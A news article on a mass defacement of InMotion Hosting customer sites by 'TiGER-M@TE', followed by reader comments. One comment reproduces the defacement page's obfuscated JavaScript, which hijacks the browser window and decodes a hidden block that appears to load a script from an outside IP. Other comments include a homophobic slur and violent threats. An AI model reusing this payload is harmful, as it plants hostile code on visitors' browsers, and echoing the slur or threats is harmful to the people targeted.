For several hours Sunday morning, Blast Magazine and many other websites in the InMotion Hosting network were attacked by a hacker called TiGER-M@TE.
InMotion, where Blast hosts one of its servers, acknowledged the breach.
“At around 4 a.m. EST, our system administration team identified a website defacement attack affecting a large number of customers. We are still investigating, but it appears that files named index.php have been defaced. We are evaluating how this has occurred and our security team will have more information shortly,” InMotion said in a statement. “While we review this issue, cPanel and SSH access has been disabled on various platforms. For additional security, we are rotating passwords on a number of accounts.”
It is unclear how many sites were hit, but it is likely hundreds, if not thousands.
This morning, the Blast homepage was briefly replaced by a black background with the red letters “Hacked” (See photo below) and all of our blogs and articles were unreachable.
This appears to be the same hacker who successfully attacked Google previously. The Hacker News interviewed TiGER-M@TE, who claimed to be hacking since 2007, working alone, and only using private exploits and zero-day attacks.
In an online posting, TiGER-M@TE claimed responsibility for launching the homepage defacement attack.
“While we can respect TiGER-M@TE’s abilities, we are disappointed that our websites were hit,” said Blast Magazine editor-in-chief John M. Guilfoil. “What truly concerns me, however, is that InMotion Hosting appeared woefully unable to prevent or defend against this kind of attack, even though homepage defacements have been going on seemingly forever. We will consult with InMotion on Monday and plan to press the company to be more proactive in its security if InMotion values its customers.”
Good post.
InMotion and Web Hosting Hub are sister companies, of which we are a client of.
I’m surprised there’s no response from them on twitter.
I too, got that email from them, after putting in a suport ticket..
I’m going to get them on the phone right now and press for more information as well.
Over 700,000 sites got hit, by Tiger-Mate, he’s from Bangladesh or India, he did it for fun. Inmotion has restored about 60% of the sties, still working on all of them. They have been tweeting on Twitter with responses, they are busy restoring sites.
For fun… he’d just increased the cost of doing business in web.
He probably did not realize this, but he just earned negative karma from half a million people, all in the name of fun? Good luck, and hope he does not get hit by the satellite on his way out.
Good luck getting them on the phone:)
I imagine they’ve got everyone in there, on a sunday, fixing things for the 95% of people who have to clue about managing a server.
I’m assuming that a lot of people would be interested in a more proactive approach to security. It would be great if we could organize this conversation in a forum somewhere rather than have 1000 people call them up and ask them the same question.
While it was not as widespread or publicized, there was a defacement attack at inmotionhosting about 4 months ago. You have to appreciate that a company has to try to maintain some sort of integrity and not say “yup we’re not that secure” but, we can also look at it this way: inmotionhosting has provided decent pricing, support and hosting services ( at least for me for several years ) and would consider them a “strategic partner” in keeping our sites, or our clients sites, up and running.
So, does anyone have any suggestions as to where/how we can have this conversation as a community?
Hi Marco,
I just wanted to touch base and let you know that we do have a specific forum setup for this incident, which you can find here:
http://forum.inmotionhosting.com/viewforum.php?f=57
Our main goal in the forum is to help users fix their sites. We are getting posts where users want to discuss the situation, both good and negative, and we’re approving them all.
Let me know if you have any questions, we’re more than happy to help.
Thanks,
– Brad
I didn’t hear anything, I just saw my speed-dial pic had changed. Too bad they don’t inform customers about data leaks but there’s a reason you never get shell access on cPanel servers.
They recently told me they were unable to upgrade to the (actually supported) 5.3 version of php, I bet it’ll be possible quite soon.
Do you respect these script kiddies?
We work hard to make a living online and these scum bags come and destroy our sites… And you say “respect” them ??
Totally agree with you
this guy tries to hack and Google Bangladesh a few months back and what the heck is Bangaldesh police doing
is he so hard to track in such a small country
May be countries like Pakistan and Bangladesh are really supporting the so called cyber terrorism.
How do someone interview them? If anyone knows who they are please post here with their info.
I am so done with InMotion Hosting, This is the second time this year that my site has been down because of a hacker. I know people who have NEVER been hacked so twice in one year tells me this group does not know what they are doing!!!
Hi M,
This is Brad with InMotion Hosting.
While I’m not trying to offer any type of excuse, I just to make sure that readers are aware of the multiple hacks.
The hack this Sunday was targeted at our entire network, and was successful due to a flaw cuased by us. This is the first time that this type of issue occurred within our Network.
There are other ways that your site can be hacked, usually through outdated software, which has nothing to do with the security of our servers. For example, if you’re running a version of Joomla from 2 years ago, there have been numeous security patches / updates released by the Joomla Team. Outdated software can make it more easier for hackers to compromise your site. Another example. If you’re running a small unknow WordPress plugin that has no/poor security built into it, your site may be compromised. Both of these examples can open your site to hackers because of the software on your account.
I just want everyone to know however that the InMotion Hosting is here to help. If your site was defaced, please let us know as we are more than happy to help. We also have a forum online specific to this incident that you may find helpful as well:
http://forum.inmotionhosting.com/viewforum.php?f=57
Please let us know if we can help.
Thanks,
– Brad
Actually, we have used InMotion for a number of years and have always found them to be responsive. I agree that it is unfortunate to have had this happen – and I was pretty freaked out when I saw my site this morning – but it didn’t take long to get things back online.
I am, and will continue to be, a satisfied InMotion client.
I’m a Web Hosting Hub member. I just noticed this happened. Just my index page was compromised. There was an added file that was called “hack_page” And it had in it’s title “Hacked by TiGER-M@TE” I didn’t view the file, just the source. So not sure what it exactly had, but I believe there was an audio file.
hack_file is a folder created by inmotion hosting themselves where they moved the hacked pages after restoring the website you can find it on Inmotion hosting website
Hi
I too have had my site hacked by this TiGER-M@TE is INMotionHosting restoring the index.php files from backup?
Thanks
Dave
TiGER-M@TE is a F*CKiNG F@GGOT.
I would love to find this guy and smack the back of his head with a metal baseball bat, right into his monitor. And then smash all of his drives, backups, towers, whatever he has. What a loser, this is what you do with your time? Die.
I was hacked and only discovered it because by accident. Inmotion Hosting couldn’t even send me an automated email. Nope, they just let it go until I noticed 13 hours after the hack. Do they care if I look like a fool with my clients — like I can’t even keep data secure? Hell, no, they don’t. Inmotion Hosting wanted as few people as possible to know about this so they could fix as much as possible without having to explain it. for those of us damaged by it…well, too bad for us. Bottom line here: they could have sent emails, but they made a strategic choice not to. That’s some cynical and messed up crap!
While I am not in this boat, I do know people that use web pages to help make ends meet.
The person(s) involved in the destruction of these sights never considers what impact it has on others.
Should the real identity of the people be discovered, stone them and let their remains shown as a warning.
Make the punishment harsh enough, and the will to commit the crime will fade away.
This is the second time this year I’ve had some crap happen with my website..which is hosted by inmotion hosting. Ive been with them for a couple of years, and was very happy with their services..until now. I am so disappointed that the company failed to notify its customers that there had been a security breach. I am so done with this company..and and moving on…….
I have two sites of mine hosted on inmotion , one of them was hacked but still inmotion has been the best for me in terms of hosting, support and pricing.
May be this would just teach them a lesson.
I am happy and will remain to be a inmotion hosting customer
Please — most of you are being too generous regarding your characterization of InMotion Hosting. While the company may have “adequately” served you in the past, in the world of 24/7 biz it is the here & now that matters. InMotion portrays itself as the epitome of web hosting service, and yet it has had **at least** two significant security breaches of its systems within the past six months. Pull back the rug on this company and you’ll see an outgunned IT staff coupled with ineffectual business leadership, all overwhelmed by the apparent runaway success of a small Tech/Hosting start-up. That’s my opinion, and it’s unlikely to change.
My website puts food on my family’s table. Fuck Tiger mate, I would rip his face out if I knew who he was.
I am a web developer and have been for over 9 years. My personal response to this, congrats. I’m glad someone with these kind of abilities only defaced the homepage…. when he could have done so much worse.
Was it wrong? Yeah, but no where near as bad as it could have been.
At least someone is testing the servers for security, right?
And a simple restore of a local or back-up of your index solves the problem right away.
Also, he doesn’t live in Bangladesh, FYI.
“outgunned IT staff coupled with ineffectual business leadership, all overwhelmed by the apparent runaway success of a small Tech/Hosting start-up.”
my sentiments exactly Tim!
this is the text from ‘hacked_page’
HackeD By TiGER-M@TE
body { scrollbar-track-color: #000000;scrollbar-darkshadow-color: #000000; scrollbar-face-color: #000000; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #000000; scrollbar-arrow-color: #FFFFFF; color:#8E959E }
.name { text-decoration: none;}
var _0x8ae2=[“\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45″,”\x6F\x70\x65\x6E”,”\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45\x2F\x73\x70\x65\x63\x69\x61\x6C\x3D\x31″,”\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6D\x67\x74\x66\x79\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D\x48\x61\x63\x6B\x65\x64\x20\x62\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45″,”\x73\x63\x72\x6F\x6C\x6C\x42\x79″,”\x74\x69\x74\x6C\x65″,”\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45″,”\x6F\x6E\x6B\x65\x79\x64\x6F\x77\x6E”,”\x72\x65\x73\x69\x7A\x65\x54\x6F”,”\x6D\x6F\x76\x65\x54\x6F”,”\x6D\x6F\x76\x65\x28\x29″,”\x72\x6F\x75\x6E\x64″,”\x66\x67\x43\x6F\x6C\x6F\x72″,”\x62\x67\x43\x6F\x6C\x6F\x72″,”\x4C\x4F\x4C”,”\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68″,”\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74″];function details(){window[_0x8ae2[1]](_0x8ae2[0]);window[_0x8ae2[1]](_0x8ae2[2]);window[_0x8ae2[1]](_0x8ae2[3]);} ;window[_0x8ae2[4]](0,1);if(document[_0x8ae2[5]]==_0x8ae2[6]){function keypressed(){return false;} ;document[_0x8ae2[7]]=keypressed;window[_0x8ae2[8]](0,0);window[_0x8ae2[9]](0,0);setTimeout(_0x8ae2[10],2);var mxm=50;var mym=25;var mx=0;var my=0;var sv=50;var status=1;var szx=0;var szy=0;var c=255;var n=0;var sm=30;var cycle=2;var done=2;function move(){if(status==1){mxm=mxm/1.05;mym=mym/1.05;mx=mx+mxm;my=my-mym;mxm=mxm+(400-mx)/100;mym=mym-(300-my)/100;window[_0x8ae2[9]](mx,my);rmxm=Math[_0x8ae2[11]](mxm/10);rmym=Math[_0x8ae2[11]](mym/10);if(rmxm==0){if(rmym==0){status=2;} ;} ;} ;if(status==2){sv=sv/1.1;scrratio=1+1/3;mx=mx-sv*scrratio/2;my=my-sv/2;szx=szx+sv*scrratio;szy=szy+sv;window[_0x8ae2[9]](mx,my);window[_0x8ae2[8]](szx,szy);if(sv<0.1){status=3;} ;} ;if(status==3){document[_0x8ae2[12]]=0xffffFF;c=c-16;if(c239){status=5;} ;} ;if(status==5){c=c-16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c0){if(done==1){status=7;} else {status=4;} ;} ;} ;} ;if(status==6){document[_0x8ae2[5]]=_0x8ae2[14];alert(_0x8ae2[14]);cycle=2;status=4;done=1;} ;if(status==7){c=c+4;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>128){status=8;} ;} ;if(status==8){window[_0x8ae2[9]](0,0);sx=screen[_0x8ae2[15]];sy=screen[_0x8ae2[16]];window[_0x8ae2[8]](sx,sy);status=9;} ;var _0xceebx11=setTimeout(_0x8ae2[10],0.3);} ;} ;Server HackeDBy if (navigator.appName == ‘Microsoft Internet Explorer’){document.write(”);}else{document.write(”);}TiGER-M@TEvar l1n3=”;
document.write(l1n3+l1n3);if (navigator.appName == ‘Microsoft Internet Explorer’){document.write(”);}else{document.write(”);}#Bangladeshi HackeR
var _0x9355=[“\x74\x69\x74\x6C\x65″,”\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45″,”\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x6F\x74\x6F\x6E\x6F\x6E\x73\x2E\x72\x75\x2F\x69\x6D\x61\x67\x65\x73\x2F\x31\x37\x2E\x30\x33\x2E\x31\x31\x2F\x62\x79\x74\x69\x67\x65\x72\x6D\x74\x65\x2E\x6A\x70\x67\x22\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x74\x68\x69\x73\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x6E\x75\x6C\x6C\x3B\x74\x68\x69\x73\x2E\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6D\x61\x67\x65\x2E\x62\x61\x79\x69\x6D\x67\x2E\x63\x6F\x6D\x2F\x6D\x61\x65\x61\x64\x61\x61\x64\x69\x2E\x6A\x70\x67\x27\x3B\x22\x20\x2F\x3E”,”\x77\x72\x69\x74\x65″];if(document[_0x9355[0]]!=_0x9355[1]){exit(0);} ;document[_0x9355[3]](_0x9355[2]);
Greetz : aBu.HaLiL501 ; w7sh.syria ; Sy-Hacker ; NmR.Hacker ; Wa7sh Hacker ; h311 c0d3#TiGER-M@TE#[email protected]©UNDERGROUND HACKERS 2007 – 2011 #EOF
var _0xd8af=[“\x25\x33\x43\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x30\x25\x36\x43\x25\x36\x31\x25\x36\x45\x25\x36\x37\x25\x37\x35\x25\x36\x31\x25\x36\x37\x25\x36\x35\x25\x33\x44\x25\x32\x32\x25\x36\x41\x25\x36\x31\x25\x37\x36\x25\x36\x31\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x32\x25\x33\x45\x25\x36\x36\x25\x37\x35\x25\x36\x45\x25\x36\x33\x25\x37\x34\x25\x36\x39\x25\x36\x46\x25\x36\x45\x25\x32\x30\x25\x36\x34\x25\x34\x36\x25\x32\x38\x25\x37\x33\x25\x32\x39\x25\x37\x42\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x33\x25\x33\x31\x25\x33\x44\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x33\x30\x25\x32\x43\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x32\x30\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x34\x25\x33\x44\x25\x32\x37\x25\x32\x37\x25\x33\x42\x25\x36\x36\x25\x36\x46\x25\x37\x32\x25\x32\x38\x25\x36\x39\x25\x33\x44\x25\x33\x30\x25\x33\x42\x25\x36\x39\x25\x33\x43\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x33\x42\x25\x36\x39\x25\x32\x42\x25\x32\x42\x25\x32\x39\x25\x37\x34\x25\x32\x42\x25\x33\x44\x25\x35\x33\x25\x37\x34\x25\x37\x32\x25\x36\x39\x25\x36\x45\x25\x36\x37\x25\x32\x45\x25\x36\x36\x25\x37\x32\x25\x36\x46\x25\x36\x44\x25\x34\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x34\x31\x25\x37\x34\x25\x32\x38\x25\x36\x39\x25\x32\x39\x25\x32\x44\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x43\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x36\x34\x25\x36\x46\x25\x36\x33\x25\x37\x35\x25\x36\x44\x25\x36\x35\x25\x36\x45\x25\x37\x34\x25\x32\x45\x25\x37\x37\x25\x37\x32\x25\x36\x39\x25\x37\x34\x25\x36\x35\x25\x32\x38\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x34\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x37\x44\x25\x33\x43\x25\x32\x46\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x33\x45″,”\x77\x72\x69\x74\x65″,”\x25\x32\x38\x36\x46\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x6C\x69\x25\x32\x38\x35\x25\x33\x42\x67\x72\x66\x78\x70\x68\x71\x77\x31\x77\x6C\x77\x6F\x68\x25\x32\x38\x35\x34\x25\x32\x38\x36\x47\x25\x32\x38\x35\x25\x33\x41\x4B\x64\x66\x6E\x68\x47\x25\x32\x38\x35\x33\x45\x25\x37\x43\x25\x32\x38\x35\x33\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x25\x33\x41\x45\x68\x25\x37\x42\x6C\x77\x25\x32\x38\x35\x25\x33\x42\x33\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x25\x33\x41\x47\x25\x32\x38\x33\x44\x67\x72\x66\x78\x70\x68\x71\x77\x31\x7A\x75\x6C\x77\x68\x25\x32\x38\x35\x25\x33\x42\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x36\x46\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x35\x33\x69\x75\x64\x70\x68\x65\x72\x75\x67\x68\x75\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x37\x33\x37\x31\x73\x6B\x73\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x68\x70\x65\x68\x67\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x45\x25\x37\x43\x62\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x36\x49\x76\x72\x78\x71\x67\x76\x7A\x69\x25\x32\x38\x36\x47\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x35\x39\x64\x78\x77\x72\x73\x6F\x64\x25\x37\x43\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x39\x6F\x72\x72\x73\x76\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x77\x25\x37\x43\x73\x68\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x64\x73\x73\x6F\x6C\x66\x64\x77\x6C\x72\x71\x32\x25\x37\x42\x30\x76\x6B\x72\x66\x6E\x7A\x64\x79\x68\x30\x69\x6F\x64\x76\x6B\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x68\x70\x65\x68\x67\x25\x32\x38\x36\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x36\x46\x32\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x33”];document[_0xd8af[1]](unescape(_0xd8af[0]));dF(_0xd8af[2]);
Non-technical savvy users are easily fooled by web hosting companies who falsely explain how far a total compromise could go. Security-minded guys will give you the following conclusions.
1 – InMotion said the goal of this mass hack is just to do defacement.
These hosting guys never know hackers have installed rootkits and backdoors for future access.
They think that it’s safe and simple as restoring clients’ web sites from backups.
Once a box is hacked at the root level, it can’t be trusted any more.
2 – Hackers could have compromised the inMotion several weeks/months before. Finally, they’ve been aware that the exploit they use have been discovered/known by other same-minded hackers. They do mass defacement to notify inMotion guys to patch this hole.
We’ve seen mass hacking these days are not just for fun and fame. They have been used for generating revenue in black markets. Now, some clients are ready to move to other hostings. Others are just staying at inMotion and hoping for this mass hack not to happen again. Rest assured, this hack will not come back as hackers may now have future access at their will using backdoors that ultilize steathy covert channels to remotely do malicious stuffs.
Stay Secure.
My site hosted on inmotionhosting, and was restored from backup. But how to restore cached picture “site hacked” from Google tools and google site preview?
rXh1BI https://twitter.com/Healty_Pills